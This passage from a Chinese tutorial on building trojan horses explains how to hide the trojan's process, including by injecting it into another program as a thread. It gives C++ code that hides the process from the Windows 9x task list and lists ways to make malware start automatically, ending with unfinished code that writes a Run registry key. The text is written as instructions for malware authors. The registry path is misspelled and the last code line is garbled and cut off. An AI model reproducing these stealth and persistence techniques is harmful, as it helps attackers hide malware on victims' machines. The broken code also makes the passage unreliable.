当进程为真隐藏的时候，那么这个木马的服务器部分程序运行之后，就不应该具备一般进程，也不应该具备服务的，也就是说，完全的溶进了系统的内核。也许你会觉得奇怪，刚刚不是说一个应用程序运行之后，一定会产生一个进程吗？的确，所以我们可以不把他做成一个应用程序，而把他做为一个线程，一个其他应用程序的线程，把自身注入其他应用程序的地址空间。而这个应用程序对于系统来说，是一个绝对安全的程序，这样，就达到了彻底隐藏的效果，这样的结果，导致了查杀黑客程序难度的增加。

　　
　　出于安全考虑，我只给出一种通过注册服务程序，实现进程伪隐藏的方法，对于更复杂，高级的隐藏方法，比如远程线程插入其他进程的方法，请参阅ShotGun的文章《NT系统下木马进程的隐藏与检测》。

　　
　　WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)

　　
　　{

　　
　　try

　　
　　{

　　
　　DWORD dwVersion = GetVersion();//取得Windows的版本号

　　
　　if (dwVersion >= 0x80000000) // Windows 9x隐藏任务列表

　　
　　{

　　
　　 int (CALLBACK *rsp)(DWORD,DWORD);

　　
　　 HINSTANCE dll=LoadLibrary("KERNEL32.DLL");//装入KERNEL32.DLL

　　
　　rsp=(int(CALLBACK *)(DWORD,DWORD))GetProcAddress(dll,"RegisterServiceProcess");//找到RegisterServiceProcess的入口

　　
　　rsp(NULL,1);//注册服务

　　
　　FreeLibrary(dll);//释放DLL模块

　　
　　}

　　
　　}

　　
　　catch (Exception &exception)//处理异常事件

　　
　　{

　　
　　//处理异常事件

　　
　　}

　　
　　return 0;

　　
　　}

　　
　　3、程序的自加载运行技术

　　
　　让程序自运行的方法比较多，除了最常见的方法：加载程序到启动组，写程序启动路径到注册表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersions\Run的方法外，还有很多其他的办法，据yagami讲，还有几十种方法之多，比如可以修改Boot.ini，或者通过注册表里的输入法键值直接挂接启动，通过修改Explorer.exe启动参数等等的方法，真的可以说是防不胜防，下面展示一段通过修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersions\Run键值来实现自启动的程序：

　　
　　自装载部分：

　　
　　HKEY hkey;

　　
　　AnsiString NewProgramName=AnsiString(sys)+AnsiString("+PName/">\\")+PName
[未结束]